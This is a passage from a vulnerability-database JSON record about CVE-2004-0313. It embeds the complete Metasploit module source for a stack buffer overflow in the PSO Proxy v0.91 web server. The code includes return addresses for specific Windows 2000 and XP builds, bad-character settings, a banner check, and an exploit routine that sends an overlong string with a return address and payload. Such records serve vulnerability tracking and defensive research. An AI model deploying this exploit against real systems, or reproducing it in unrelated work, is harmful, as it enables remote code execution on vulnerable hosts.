10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16790/"}], "metasploit": [{"lastseen": "2020-04-11T21:00:59", "description": "This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten.\n", "published": "2007-09-09T22:37:43", "type": "metasploit", "title": "PSO Proxy v0.91 Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2017-11-08T16:00:24", "id": "MSF:EXPLOIT/WINDOWS/HTTP/PSOPROXY91_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n If a client sends an excessively long string the stack is overwritten.\n },\n 'Author' => [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2004-0313' ],\n [ 'OSVDB', '4028' ],\n [ 'EDB', '156' ],\n [ 'BID', '9706' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 370,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.\n [ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll\n [ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll\n [ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll\n [ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll\n [ 'Windows XP Pro SP2 English',\t { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Feb 20 2004'\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n ])\n end\n\n def check\n connect\n sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")\n banner = sock.get_once\n if (banner.to_s =~ /PSO Proxy 0\\.9/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n exploit = rand_text_alphanumeric(1024, payload_badchars)\n exploit += [target['Ret']].pack('V') + payload.encoded\n\n sock.put(exploit + \"\\r\\n\\r\\n\")\n\n disconnect\n handler\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/psoproxy91_overflow.rb"}]}
